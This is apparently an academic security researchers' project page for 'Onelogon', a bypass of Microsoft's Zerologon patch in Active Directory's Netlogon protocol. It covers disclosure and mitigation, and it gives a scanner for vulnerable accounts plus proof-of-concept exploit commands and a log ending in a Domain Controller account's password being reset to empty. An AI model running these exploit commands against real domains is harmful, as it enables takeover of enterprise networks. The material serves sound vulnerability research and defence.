Onelogon: Taking over Active Directory Accounts via Netlogon

Microsoft’s Active Directory (AD) is a critical component of the IT infrastructure of numerous enterprises. Thus, security vulnerabilities in AD can have dire consequences for the security posture of an organization’s IT infrastructure. At the core of the AD architecture is the Netlogon Remote Protocol, which is used to manage computer accounts, delegate authentication requests, and various other management tasks.

In 2020, Tervoort identified Zerologon, a critical vulnerability in Netlogon, which allowed attackers to fully compromise an AD management domain. In turn, Microsoft released two patches: one aiming to rectify the cryptographic vulnerability that enabled the attack, and the second one to ensure that all Netlogon communication is signed and sealed.

In this paper, we analyze these patches and show that they are insufficient to mitigate the underlying vulnerabilities. We show that the cryptographic patch can be bypassed by an unprivileged attacker within the AD domain. We introduce the Onelogon attack with two distinct variants for varying attacker capabilities, both of which allow an attacker to take over a vulnerable AD account in approximately 30 minutes. If this AD account belongs to a Domain Controller, an attacker can leverage Onelogon to fully compromise the AD domain.

With the goal of mitigating the attacks, we identified their underlying root cause: the incorrect use of AES-CFB8 encryption. Both the earlier Zerologon attack and our new attack exploit how Netlogon incorrectly uses AES-CFB8. Finally, we provide and compare various mitigation and detection approaches for Microsoft and AD operators to prevent account takeover attacks and authentication bypasses in the short term and fundamentally. Unfortunately, addressing the underlying root cause requires a backward-incompatible change to Netlogon: reimplementing AES-CFB8 correctly.

We disclosed this issue to Microsoft and CERT-Bund, but do not expect any fixes to be forthcoming. In the meantime, we advise users to apply the mitigation and detection strategies outlined in this paper.

Source Code: github.com/rub-softsec/onelogon

High-level Summary

The vulnerability outlined in our paper attacks a weakness in the 2020 cryptographic patch for the Zerologon vulnerability. Accounts listed in a group policy intended to allow support for legacy setups that do not support Netlogon signing and sealing are vulnerable to this attack. A detailed description of the vulnerability, the expected full attack chain, and possible mitigations can be found in the paper.

Scanning for Vulnerable Setups

To determine which accounts a Domain Controller lists in its VulnerableChannelAllowList, we provide a scanner that parses the registry hive and GPO volume share of the Domain Controller. Note that accessing the registry for this scan requires Domain Administrator privileges (the exploit, of course, does not).

1
2
3
4
5
6
7

# Use the specified username and password to scan the target DC.
poetry run scan --dc-ip <IP of target DC> \
                --username <username> \
                --password <password>

# Specify `--help` to get additional usage instructions.
poetry run scan --help

A positive scan result (there are vulnerable accounts on the Domain Controller) will reflect the security descriptor containing the vulnerable accounts (in Microsoft’s Security Descriptor Definition Language):

~$ poetry run scan --dc-ip 192.168.108.244 -u Administrator -p Xb52RLIiL5k2BhMC
[+] Found 1 matching policies in SYSVOL Share.
[+] Found vulnerable channel allow list in policy '{6AC1786C-016F-11D2-945F-00C04fB984F9}':
    'O:BAG:BAD:(A;;RC;;;BA)(A;;RC;;;S-1-5-21-1725695585-1077004420-3792776154-1000)'
[+] Found VulnerableChannelAllowList registry configuration:
    O:BAG:BAD:(A;;RC;;;BA)(A;;RC;;;S-1-5-21-1725695585-1077004420-3792776154-1000)

A negative result (the target DC is not vulnerable) will instead look like this:

~$ poetry run scan --dc-ip 192.168.108.244 -u Administrator -p Xb52RLIiL5k2BhMC
[-] No matching policies found in SYSVOL Share.
[-] Error while querying registry: RRP SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND
    - The system cannot find the file specified.

Exploitation

To run the proof-of-concept exploit against a target Domain Controller, select a vulnerable account first. You will need the Domain Controller’s IP address, its host name, and the name of the vulnerable account.

In our example setup, the vulnerable Domain Controller is named DC. Its machine account (DC$) is included in the GPO policy and therefore vulnerable to Onelogon.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

# Run the meet-in-the-middle attack (Section 4.5 of the paper)
poetry run onelogon --dc-ip <IP of target DC> \
                    --dc-name <Name of target DC> \
                    --username <Target account name>

# Run the 24-bit brute-force with a computer account (Section 4.4)
poetry run onelogon --dc-ip <IP of target DC> \
                    --dc-name <Name of target DC> \
                    --username <Target account name> \
                    --comp-username <Computer account> \
                    --comp-pass <Computer account password>

# Run the (slow) 32-bit brute-force with a computer account
poetry run onelogon --naive --dc-ip <IP of target DC> \
                    --dc-name <Name of target DC> \
                    --username <Target account name> \
                    --comp-username <Computer account> \
                    --comp-pass <Computer account password>

# Run the (very slow) 32-bit brute-force without a computer account
poetry run onelogon --naive --dc-ip <IP of target DC> \
                    --dc-name <Name of target DC> \
                    --username <Target account name>

~$ poetry run onelogon --dc-ip 192.168.108.244 --dc-name DC --username 'DC$'
[+] Namespace(dc_name='DC', dc_ip='192.168.108.244', username='DC$', comp_username=None,
    comp_password=None, comp_hash=None, workers=100)
[+] Successfully bound to Netlogon RPC on DC (192.168.108.244)
[+] Successfully bound to Netlogon RPC on DC (192.168.108.244)
[+] Using flags: (0b100001000111111111111111111111)
1: A IGNORED (Account lockout)
1: B NT3.5 BDC continuous update
1: C RC4 support
1: D IGNORED (Promotion count(deprecated))
1: E Supports BDC handling Changelogs
1: F Supports Restarting full DC sync
1: G Does not require ValidationLevel 2 for nongeneric passthrough
1: H Supports DatabaseRedo
1: I Supports refusal of password changes
1: J Supports NetrLogonSendToSam
1: K Supports generic pass-through
1: L Supports concurrent RPC calls
1: M Supports avoid of user account database replication
1: N Supports avoid of Security Authority database replication
1: O Supports Strong keys
1: P Supports transitive trusts
1: Q IGNORED (Supports DNS trusts)
1: R Supports NetrServerPasswordSet2
1: S Supports NetrLogonGetDomainInfo
1: T Supports cross-forest trusts
1: U No NT4 Emulation
0: V Supports RODC pass-through
0: 0
0: 0
1: W Supports AES 128-bit CFB and SHA2
0: 0
0: 0
0: 0
0: 0
1: X IGNORED (Authenticated RPC via lsass supported)
0: Y Supports secure RPC authentication
0: Z Supports Kerberos for secure channel setup
[*] Estimated total tries without flushing: 2^16 / 2

[+] Starting the brute force attack...
[*] ROUND STATS:
[*] REQ:     Took 5.0858272750047036 seconds,
             average time per attempt: 0.00286042028965393909 seconds
[*] TRY:     Took 120.00023781700293 seconds
[*] CLEANUP: Took 5.999754648655653e-08 seconds
[*] ALL:     Took 125.08606619200145 seconds,
             average time per attempt: 0.07035211821822354161 seconds
[*]
[*] TOTAL STATS:
[*] TOTAL:   0.10 hours passed, average time per attempt: 0.06760343967316766178 seconds
[*] TRIES:   5538, average tries per cycle: 1846
[*] Estimated progress: 16.90%, estimated time remaining: 0.51 hours
[+] !!!Successfully authenticated DC$ on DC with b'\x00\x00\x00\x00\x11\x11\x04x'!!!
[+] Password set successfully to empty string!
[+] Successfully set the password of DC$ to an empty string!
[+] All tasks have been processed, stopping workers.
[+] All workers have been stopped.